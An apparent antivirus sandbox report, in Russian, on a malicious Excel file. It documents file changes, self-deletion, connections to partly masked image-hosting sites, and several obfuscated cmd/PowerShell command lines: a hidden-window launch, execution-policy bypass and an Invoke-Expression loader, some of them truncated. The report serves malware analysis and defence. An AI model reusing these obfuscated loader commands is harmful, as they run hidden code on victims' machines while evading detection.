Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C"sET knuY= ( .('n'+'e'+("{0}{1}{2}"-f 'w','-OBj','Ect')) (("{1}{0}"-f'Com','iO.')+("{0}{1}" -f 'pRESs','I')+("{0}{1}" -f 'o','N.DEf')+("{0}{1}"-f'la','tes')+("{1}{0}" -f 'Am','tRe'))( [io.m...
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\fdd21000
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
Самоудаляется.
Сетевая активность
Подключается к
- 'i.##gur.com':443
- 'im####2.imgbox.com':443
TCP
- 'i.##gur.com':443
- 'im####2.imgbox.com':443
UDP
- DNS ASK i.##gur.com
- DNS ASK im####2.imgbox.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C"sET knuY= ( .('n'+'e'+("{0}{1}{2}"-f 'w','-OBj','Ect')) (("{1}{0}"-f'Com','iO.')+("{0}{1}" -f 'pRESs','I')+("{0}{1}" -f 'o','N.DEf')+("{0}{1}"-f'la','tes')+("{1}{0}" -f 'Am','tRe'))( [io.m...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C%TPb%
- '<SYSTEM32>\cmd.exe' /S /D /c" eCHo IEX (DIR enV:KNuy).Value"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nopROFi -NoNInTERACtI -WInDOWsTY hidDen -noLog -EXECut bYPASs -c .( $PShome[21]+$psHOme[30]+'x')( ${iNPUT})
